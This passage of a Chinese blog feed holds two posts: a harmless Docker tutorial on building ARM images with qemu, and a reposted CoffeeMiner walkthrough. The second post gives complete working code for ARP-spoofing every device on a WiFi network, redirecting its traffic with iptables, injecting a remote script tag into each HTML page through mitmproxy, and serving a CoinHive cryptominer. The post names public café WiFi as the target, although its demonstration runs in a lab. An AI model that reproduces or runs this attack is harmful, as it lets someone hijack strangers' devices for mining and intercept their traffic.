<content type="html"><![CDATA[<h2 id="起因:"><a href="#起因:" class="headerlink" title="起因:"></a>起因:</h2><p>最近在使用 <a href="https://github.com/Vector000/bilive_client">bilive_client</a>挂B站的直播和主站日常任务,由于每次更新都需要重新编译+管理node环境太麻烦,所以开始使用Docker</p><h2 id="遇到的坑:"><a href="#遇到的坑:" class="headerlink" title="遇到的坑:"></a>遇到的坑:</h2><p>首先,Google一下找到了这个<a href="https://github.com/docker/hub-feedback/issues/1261">https://github.com/docker/hub-feedback/issues/1261</a> 和 <a href="https://github.com/davidecavestro/mariadb-docker-armhf">https://github.com/davidecavestro/mariadb-docker-armhf</a> 这个示例,按照里面说的在Dockerfile同级目录下建立hooks文件夹,并放入<code>post_checkout</code>和<code>pre_build</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hooks</span><br><span class="line">|——pre_build</span><br><span class="line">|——post_checkout</span><br><span class="line">Dockerfile</span><br></pre></td></tr></table></figure><figure class="highlight bash"><figcaption><span>pre_build</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">docker run --<span class="built_in">rm</span> --privileged multiarch/qemu-user-static:register --reset</span><br></pre></td></tr></table></figure><figure class="highlight bash"><figcaption><span>post_checkout</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">curl -L https://github.com/balena-io/qemu/releases/download/v3.0.0%2Bresin/qemu-3.0.0+resin-arm.tar.gz | tar zxvf - -C . && <span class="built_in">mv</span> qemu-3.0.0+resin-arm/qemu-arm-static .</span><br></pre></td></tr></table></figure><p>然后在Dockerfile里加入一行</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">COPY qemu-arm-static /usr/bin</span><br></pre></td></tr></table></figure><p><strong>然而并没有卵用</strong></p><span id="more"></span><p>检查日志,发现Autobuild提示<code>no such a file or dictionary</code>(黑人问号.jpg)这就让人头疼了<br>继续Google,发现有人已经反馈过这个情况 <a href="https://forums.docker.com/t/resolved-automated-docker-build-fails/22831">https://forums.docker.com/t/resolved-automated-docker-build-fails/22831</a> 官方确认是Bug而且被标记为已解决(再次黑人问号.jpg)<br><strong>解决了个卵啊?</strong></p><p>没办法了,直接上二段构建<br>先把<code>qemu-***-static</code>放到项目里,如果是(ARMv8 64)使用<code>qemu-aarch64-static</code></p><figure class="highlight dockerfile"><figcaption><span>Dockerfile</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 这里用什么镜像都可以,反正不会影响到最终输出的镜像,我使用的是alpine,如果用debian-stretch需要自己更改下面的内容</span></span><br><span class="line"><span class="keyword">FROM</span> alpine AS builder</span><br><span class="line"></span><br><span class="line"><span class="keyword">MAINTAINER</span> Disappear9</span><br><span class="line"><span class="comment"># 使用wget而不是git下载qemu,加速构建</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> apk --no-cache add unzip \</span></span><br><span class="line"><span class="language-bash"> && wget https://github.com/Disappear9/bilive_client_docker/archive/master.zip \</span></span><br><span class="line"><span class="language-bash"> && unzip master.zip \</span></span><br><span class="line"><span class="language-bash"> && <span class="built_in">mkdir</span> /qemu \</span></span><br><span class="line"><span class="language-bash"> && <span class="built_in">cp</span> bilive_client_docker-master/qemu/* /qemu \</span></span><br><span class="line"><span class="language-bash"> && <span class="built_in">rm</span> master.zip \</span></span><br><span class="line"><span class="language-bash"><span class="comment"># 下载需要编译的代码</span></span></span><br><span class="line"> && wget https://github.com/lzghzr/bilive_client/archive/master.zip \</span><br><span class="line"> && unzip master.zip \</span><br><span class="line"> && mkdir /app \</span><br><span class="line"> && mv bilive_client-master/* /app</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">FROM</span> arm32v6/node:alpine AS release</span><br><span class="line"><span class="comment"># 从builder把qemu复制到/usr/bin,这里建议把需要编译的代码也直接复制进来,这样会让layer更美观一些。</span></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> --from=builder /qemu/qemu-arm-static /usr/bin</span></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> --from=builder /app /app</span></span><br><span class="line"></span><br></pre></td></tr></table></figure><p>最后,附上Github地址 <a href="https://github.com/Disappear9/bilive_client_docker">https://github.com/Disappear9/bilive_client_docker</a> 欢迎参考<br>DockerHub地址 <a href="https://hub.docker.com/r/disappear9/bilive_client">https://hub.docker.com/r/disappear9/bilive_client</a></p><h2 id="还有一些问题"><a href="#还有一些问题" class="headerlink" title="还有一些问题"></a>还有一些问题</h2><p>Autobuild只有在Github有push时才会触发,这就很尴尬,在源码更新时需要手动触发……</p>]]></content>
<summary type="html"><h2 id="起因:"><a href="#起因:" class="headerlink" title="起因:"></a>起因:</h2><p>最近在使用 <a href="https://github.com/Vector000/bilive_client">bilive_client</a>挂B站的直播和主站日常任务,由于每次更新都需要重新编译+管理node环境太麻烦,所以开始使用Docker</p>
<h2 id="遇到的坑:"><a href="#遇到的坑:" class="headerlink" title="遇到的坑:"></a>遇到的坑:</h2><p>首先,Google一下找到了这个<a href="https://github.com/docker/hub-feedback/issues/1261">https://github.com/docker/hub-feedback/issues/1261</a> 和 <a href="https://github.com/davidecavestro/mariadb-docker-armhf">https://github.com/davidecavestro/mariadb-docker-armhf</a> 这个示例,按照里面说的在Dockerfile同级目录下建立hooks文件夹,并放入<code>post_checkout</code>和<code>pre_build</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hooks</span><br><span class="line">|——pre_build</span><br><span class="line">|——post_checkout</span><br><span class="line">Dockerfile</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><figcaption><span>pre_build</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">docker run --<span class="built_in">rm</span> --privileged multiarch/qemu-user-static:register --reset</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><figcaption><span>post_checkout</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line">curl -L https://github.com/balena-io/qemu/releases/download/v3.0.0%2Bresin/qemu-3.0.0+resin-arm.tar.gz | tar zxvf - -C . &amp;&amp; <span class="built_in">mv</span> qemu-3.0.0+resin-arm/qemu-arm-static .</span><br></pre></td></tr></table></figure>
<p>然后在Dockerfile里加入一行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">COPY qemu-arm-static /usr/bin</span><br></pre></td></tr></table></figure>
<p><strong>然而并没有卵用</strong></p></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>CoffeeMiner:劫持WiFi网络接入设备进行“挖矿”的框架</title>
<link href="https://thinkalone.win/CoffeeMiner.html"/>
<id>https://thinkalone.win/CoffeeMiner.html</id>
<published>2018-01-31T13:25:20.000Z</published>
<updated>2018-01-31T13:25:20.000Z</updated>
<content type="html"><![CDATA[<p><strong>几个星期以前,我看到了网上关于黑客劫持星巴克WiFi网络中的笔记本电脑进行“挖矿”的报道,非常有意思,结合分析,我认为,还能用中间人MITM测试方式来实现类似目的。本文中我们就来讨论,如何以MITM方式在html页面中注入javascript,让那些接入公共WIFI的电子设备成为黑客手中的“挖矿”矿工。最终我会编写一个实际的被称为“CoffeeMiner”的脚本,可以用它来在咖啡店等公开WIFI网络环境中进行匿名渗透,实现掌控大量电子设备开展“挖矿”目的。</strong></p><p><strong>测试场景</strong></p><p>要在在一个公开的WIFI网络环境中实现该种目的,CoffeeMiner测试者要试图拦截用户和路由器之间的流量,如下所示:<br><img src="/pictures/CoffeeMiner/1.png"><br><strong>CoffeeMiner:劫持WiFi网络接入设备进行“挖矿”的恶意框架</strong></p><span id="more"></span><h2 id="场景设置"><a href="#场景设置" class="headerlink" title="场景设置"></a>场景设置</h2><p>真实场景中,WIFI网络中接入了各种智能手机或平板电脑,为了方便深入分析,我们搭建了一个虚拟网络环境进行测试。在此会用到VirtualBox和安装在其中的Kali Linux,我们会安装3个虚拟机Kali系统,分别扮演以下角色:</p><blockquote><p>受害者:接入了WIFI路由器并浏览了某些恶意页面<br>测试者:运行CoffeeMiner工具,发起MITM测试</p></blockquote><p><strong>路由/网关设备:起到普通网关作用</strong></p><p><img src="/pictures/CoffeeMiner/2.png"></p><p><strong>一旦发起测试,实际场景应该是这样的,即受害者的网络流量要被劫持:</strong></p><p><img src="/pictures/CoffeeMiner/3.png"></p><p>我们分别对3台虚拟机进行以下配置:</p><p><strong>受害者</strong><br>网络适配器:</p><blockquote><p>eth0: Host-only Adapter<br>/etc/network/interfaces:<br> <img src="/pictures/CoffeeMiner/4.png"></p></blockquote><p><strong>测试者</strong><br>网络适配器:</p><blockquote><p>eth0: Host-only Adapter<br>/etc/network/interfaces:<br><img src="/pictures/CoffeeMiner/5.png"></p></blockquote><p><strong>路由/网关设备</strong><br>网络适配器:</p><blockquote><p>eth0: Bridged Adapter<br>eth1: Host-only Adapter<br>/etc/network/interfaces:<br><img src="/pictures/CoffeeMiner/6.png"></p></blockquote><h1 id="编写CoffeeMiner代码"><a href="#编写CoffeeMiner代码" class="headerlink" title="编写CoffeeMiner代码"></a>编写CoffeeMiner代码</h1><p><strong>ARP spoofing功能模块</strong><br>在这里,我们采用ARP spoofing来实现中间人MITM测试:</p><blockquote><p>在计算机网络中,ARP欺骗、ARP缓存中毒或ARP路由毒化都是测试者在局域网中发送假冒ARP消息的技术,一般来说,其目标是将测试者的MAC地址与默认网关或其它主机的IP地址相关联,从而可将该IP地址相关的任何网络通信流量转发到测试者电脑,实现流量拦截和数据窃取等多种恶意目的。</p></blockquote><p><strong>为了实现该功能,我们要用到arpspoof和嗅探工具dsniff:</strong><br><img src="/pictures/CoffeeMiner/7.png"></p><h2 id="mitmproxy"><a href="#mitmproxy" class="headerlink" title="mitmproxy"></a>mitmproxy</h2><p>mitmproxy是一款流量分析和编辑工具,可以用它来发起中间人测试MITM。在此,我们可以用它来在html页面中注入javascript脚本,出于操作简易,我们只向html页面中注入一行代码,之后该行代码就会远程调用执行相应的javascript挖矿脚本。该行注入代码为:</p><pre><code><script src="http://httpserverIP:8000/script.js"></script></code></pre><h2 id="Injector"><a href="#Injector" class="headerlink" title="Injector"></a>Injector</h2><p>一旦我们截获了受害者的网络流量之后,就可在其中注入我们构造的脚本,为了实现脚本注入,我们需要用到 mitmproxy API 来编写相应injector代码:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">from</span> mitmproxy <span class="keyword">import</span> ctx, http</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Injector</span>:</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, path</span>):</span><br><span class="line"> <span class="variable language_">self</span>.path = path</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">response</span>(<span class="params">self, flow: http.HTTPFlow</span>) -> <span class="literal">None</span>:</span><br><span class="line"> <span class="keyword">if</span> <span class="variable language_">self</span>.path:</span><br><span class="line"> html = BeautifulSoup(flow.response.content, <span class="string">"html.parser"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="variable language_">self</span>.path)</span><br><span class="line"> <span class="built_in">print</span>(flow.response.headers[<span class="string">"content-type"</span>])</span><br><span class="line"> <span class="keyword">if</span> flow.response.headers[<span class="string">"content-type"</span>] == <span class="string">'text/html'</span>:</span><br><span class="line"> script = html.new_tag(</span><br><span class="line"> <span class="string">"script"</span>,</span><br><span class="line"> src=<span class="variable language_">self</span>.path,</span><br><span class="line"> <span class="built_in">type</span>=<span class="string">'application/javascript'</span>)</span><br><span class="line"> html.body.insert(<span class="number">0</span>, script)</span><br><span class="line"> flow.response.content = <span class="built_in">str</span>(html).encode(<span class="string">"utf8"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"Script injected."</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>():</span><br><span class="line"> parser = argparse.ArgumentParser()</span><br><span class="line"> parser.add_argument(<span class="string">"path"</span>, <span class="built_in">type</span>=<span class="built_in">str</span>)</span><br><span class="line"> args = parser.parse_args()</span><br><span class="line"><span class="keyword">return</span> Injector(args.path)</span><br></pre></td></tr></table></figure><h2 id="HTTP-Server"><a href="#HTTP-Server" class="headerlink" title="HTTP Server"></a>HTTP Server</h2><p>如前所述,当injector向html页面中添加了一行代码后,就会调用JavaScript挖矿脚本,所以,需要在HTTP服务器中部署该脚本文件。而为了实现该脚本的请求调用,须在测试者电脑中部署一个HTTP服务器,为此,我们要用到Python的‘http.server’库功能:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">import</span> http.server</span><br><span class="line"><span class="keyword">import</span> socketserver</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line">PORT = <span class="number">8000</span></span><br><span class="line">web_dir = os.path.join(os.path.dirname(__file__), <span class="string">'miner_script'</span>)</span><br><span class="line">os.chdir(web_dir)</span><br><span class="line">Handler = http.server.SimpleHTTPRequestHandler</span><br><span class="line">httpd = socketserver.TCPServer((<span class="string">""</span>, PORT), Handler)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"serving at port"</span>, PORT)</span><br><span class="line">httpd.serve_forever()</span><br></pre></td></tr></table></figure><p>上面的代码就是一个托管挖矿服务的简单HTTP服务器,其中托管脚本会被放置在/miner_script目录下,为了实现真正的挖矿,我在此使用了CoinHive的JavaScript挖矿平台工具。</p><p><strong>CoinHive挖矿工具</strong><br>Coinhive其实是一个门罗币挖矿工具,它可以嵌入被测试者控制的肉鸡网站上,每当用户访问该网站时,用户CPU资源就会被占用,用来计算CryptoNote协议相关的加密货币哈希值,用户电脑也就间接沦为了测试者的“矿工”。</p><p>Coinhive挖矿工具的执行,要在受害者打开页面40秒后才能开始,所以,如果受害者浏览页面时间不足40秒,Coinhive的挖矿任务失效。本例中,我会在受害者请求的每个html页面中注入挖矿脚本,所以时间上肯定足够。<br><img src="/pictures/CoffeeMiner/8.jpg"></p><h2 id="CoffeeMiner代码组合"><a href="#CoffeeMiner代码组合" class="headerlink" title="CoffeeMiner代码组合"></a>CoffeeMiner代码组合</h2><p>等所有条件准备好之后,我们就可以在某个WIFI环境中进行隐蔽部署了,现在我们来看看CoffeeMiner的实现。<br>CoffeeMiner脚本会执行ARP欺骗,并能用mitmproxy将CoinHive 挖矿程序注入受害者请求的html页面中。<br>首先,为了把测试者主机转化为中间代理,需要对ip_forwarding和IPTABLES进行配置:</p><p><img src="/pictures/CoffeeMiner/9.png"></p><p>为了对所有受害者执行ARP欺骗,我会使用一些Python代码来读取所有受害者IP,并用一个名为‘victims.txt’的文件来存储这些IP,之后再对这些IP执行ARP欺骗:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#get gateway_ip</span></span><br><span class="line">gateway = sys.argv[<span class="number">1</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"gateway: "</span> + gateway)</span><br><span class="line"><span class="comment">#get victims_ip</span></span><br><span class="line">victims = [line.rstrip(<span class="string">'\n'</span>) <span class="keyword">for</span> line <span class="keyword">in</span> <span class="built_in">open</span>(<span class="string">"victims.txt"</span>)]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"victims:"</span>)</span><br><span class="line"><span class="built_in">print</span>(victims)</span><br><span class="line"><span class="comment">#run the arpspoof for each victim, each one in a new console</span></span><br><span class="line"><span class="keyword">for</span> victim <span class="keyword">in</span> victims:</span><br><span class="line"> os.system(<span class="string">"xterm -e arpspoof -i eth0 -t "</span> + victim + <span class="string">" "</span> + gateway + <span class="string">" &"</span>)</span><br><span class="line"> os.system(<span class="string">"xterm -e arpspoof -i eth0 -t "</span> + gateway + <span class="string">" "</span> + victim + <span class="string">" &"</span>)</span><br></pre></td></tr></table></figure><p>一旦ARP欺骗操作发起后,运行HTTP服务器即可:</p><blockquote><p>python3 httpServer.py</p></blockquote><p>之后,就可利用mitmproxy来执行注入程序 injector.py:</p><blockquote><p>mitmdump -s ‘injector.py <a href="http://httpserverip:8000/script.js">http://httpserverIP:8000/script.js</a>‘</p></blockquote><h2 id="最终脚本"><a href="#最终脚本" class="headerlink" title="最终脚本"></a>最终脚本</h2><figure class="highlight python"><figcaption><span>coffeeMiner.py</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="comment">#get gateway_ip (router)</span></span><br><span class="line">gateway = sys.argv[<span class="number">1</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"gateway: "</span> + gateway)</span><br><span class="line"><span class="comment">#get victims_ip</span></span><br><span class="line">victims = [line.rstrip(<span class="string">'\n'</span>) <span class="keyword">for</span> line <span class="keyword">in</span> <span class="built_in">open</span>(<span class="string">"victims.txt"</span>)]</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"victims:"</span>)</span><br><span class="line"><span class="built_in">print</span>(victims)</span><br><span class="line"><span class="comment">#configure routing (IPTABLES)</span></span><br><span class="line">os.system(<span class="string">"echo 1 > /proc/sys/net/ipv4/ip_forward"</span>)</span><br><span class="line">os.system(<span class="string">"iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE"</span>)</span><br><span class="line">os.system(<span class="string">"iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080"</span>)</span><br><span class="line">os.system(<span class="string">"iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080"</span>)</span><br><span class="line"><span class="comment">#run the arpspoof for each victim, each one in a new console</span></span><br><span class="line"><span class="keyword">for</span> victim <span class="keyword">in</span> victims:</span><br><span class="line"> os.system(<span class="string">"xterm -e arpspoof -i eth0 -t "</span> + victim + <span class="string">" "</span> + gateway + <span class="string">" &"</span>)</span><br><span class="line"> os.system(<span class="string">"xterm -e arpspoof -i eth0 -t "</span> + gateway + <span class="string">" "</span> + victim + <span class="string">" &"</span>)</span><br><span class="line"><span class="comment">#start the http server for serving the script.js, in a new console</span></span><br><span class="line">os.system(<span class="string">"xterm -hold -e 'python3 httpServer.py' &"</span>)</span><br><span class="line"><span class="comment">#start the mitmproxy</span></span><br><span class="line">os.system(<span class="string">"~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T"</span>)</span><br></pre></td></tr></table></figure><figure class="highlight python"><figcaption><span>injector.py</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> bs4 <span class="keyword">import</span> BeautifulSoup</span><br><span class="line"><span class="keyword">from</span> mitmproxy <span class="keyword">import</span> ctx, http</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Injector</span>:</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, path</span>):</span><br><span class="line"> <span class="variable language_">self</span>.path = path</span><br><span class="line"> <span class="keyword">def</span> <span class="title function_">response</span>(<span class="params">self, flow: http.HTTPFlow</span>) -> <span class="literal">None</span>:</span><br><span class="line"> <span class="keyword">if</span> <span class="variable language_">self</span>.path:</span><br><span class="line"> html = BeautifulSoup(flow.response.content, <span class="string">"html.parser"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="variable language_">self</span>.path)</span><br><span class="line"> <span class="built_in">print</span>(flow.response.headers[<span class="string">"content-type"</span>])</span><br><span class="line"> <span class="keyword">if</span> flow.response.headers[<span class="string">"content-type"</span>] == <span class="string">'text/html'</span>:</span><br><span class="line"> <span class="built_in">print</span>(flow.response.headers[<span class="string">"content-type"</span>])</span><br><span class="line"> script = html.new_tag(</span><br><span class="line"> <span class="string">"script"</span>,</span><br><span class="line"> src=<span class="variable language_">self</span>.path,</span><br><span class="line"> <span class="built_in">type</span>=<span class="string">'application/javascript'</span>)</span><br><span class="line"> html.body.insert(<span class="number">0</span>, script)</span><br><span class="line"> flow.response.content = <span class="built_in">str</span>(html).encode(<span class="string">"utf8"</span>)</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"Script injected."</span>)</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">start</span>():</span><br><span class="line"> parser = argparse.ArgumentParser()</span><br><span class="line"> parser.add_argument(<span class="string">"path"</span>, <span class="built_in">type</span>=<span class="built_in">str</span>)</span><br><span class="line"> args = parser.parse_args()</span><br><span class="line"> <span class="keyword">return</span> Injector(args.path)</span><br></pre></td></tr></table></figure><h2 id="测试执行操作:"><a href="#测试执行操作:" class="headerlink" title="测试执行操作:"></a>测试执行操作:</h2><blockquote><p>python3 coffeeMiner.py RouterIP</p></blockquote><h2 id="测试演示"><a href="#测试演示" class="headerlink" title="测试演示"></a>测试演示</h2><p>我们在虚拟机环境下进行演示,先来在终端中进行手动测试:</p><p><img src="/pictures/CoffeeMiner/10.png"></p><p>ARP欺骗执行之后,injector注入程序和HTTP服务器就绪,一旦受害者访问了恶意网页之后,其所有网络流量将会转发到测试者主机,并触发注入:</p><p><img src="/pictures/CoffeeMiner/11.png"></p><p>因此,受害者浏览的页面将被注入恶意挖矿服务调用代码:</p><p><img src="/pictures/CoffeeMiner/12.gif"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>如上所示,黑客可以非常容易地在某个WIFI环境中发起隐蔽恶意行为,对接入网络的大量电子设备进行掌控并利用其开展“挖矿”活动。通常,一些具备强力信号的WIFI网络可能会被黑客利用,另外,黑客可能还会在程序中加入Nmap扫描和sslstrip功能。CoffeeMiner完整代码请访问 <a href="https://github.com/arnaucode/coffeeMiner">https://github.com/arnaucode/coffeeMiner</a></p><blockquote><p>转载自FreeBuf.COM <a href="http://www.freebuf.com/articles/wireless/159688.html">http://www.freebuf.com/articles/wireless/159688.html</a></p></blockquote>]]></content>
<summary type="html"><p><strong>几个星期以前,我看到了网上关于黑客劫持星巴克WiFi网络中的笔记本电脑进行“挖矿”的报道,非常有意思,结合分析,我认为,还能用中间人MITM测试方式来实现类似目的。本文中我们就来讨论,如何以MITM方式在html页面中注入javascript,让那些接入公共WIFI的电子设备成为黑客手中的“挖矿”矿工。最终我会编写一个实际的被称为“CoffeeMiner”的脚本,可以用它来在咖啡店等公开WIFI网络环境中进行匿名渗透,实现掌控大量电子设备开展“挖矿”目的。</strong></p>
<p><strong>测试场景</strong></p>
<p>要在在一个公开的WIFI网络环境中实现该种目的,CoffeeMiner测试者要试图拦截用户和路由器之间的流量,如下所示:<br><img src="/pictures/CoffeeMiner/1.png"><br><strong>CoffeeMiner:劫持WiFi网络接入设备进行“挖矿”的恶意框架</strong></p></summary>
<category term="网络安全" scheme="https://thinkalone.win/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="网络安全" scheme="https://thinkalone.win/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
</entry>
</feed>